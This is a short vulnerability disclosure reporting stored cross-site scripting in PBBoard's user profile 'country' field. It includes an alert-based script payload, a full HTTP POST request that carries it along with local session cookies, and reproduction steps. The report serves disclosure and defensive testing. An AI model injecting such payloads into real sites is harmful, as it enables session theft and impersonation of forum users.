Description

When making changes to update information, there is a country parameter to insert the xss payload

Step 1 : Update user Personal information

Proof of Concept

// PoC request:  
// payload: "><script>alert(String.fromCharCode(88,83))</script>

POST /pbboard/index.php?page=usercp&control=1&info=1&start=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/pbboard/index.php?page=usercp&control=1&info=1&main=1
Cookie: eid=2; download_started=0; PHPSESSID=dngclv00c2khlomtdkccv6vfh2; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; PowerBB_lastvisit=1680611668; plupload_ui_view=thumbs
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

birth_date=14-4-2005&country=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%29%29%3C%2Fscript%3E&gender=m&website=&info=%5C%5C%5C%5C%5C%5C%5C%22%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29&away=0&away_msg=1&send=Save+settings

Step 2. Click on the post of user was edit

Step 3. Alert XSS show

Impact

XSS can cause serious issues. Attackers often leverage XSS to steal session cookies and impersonate the user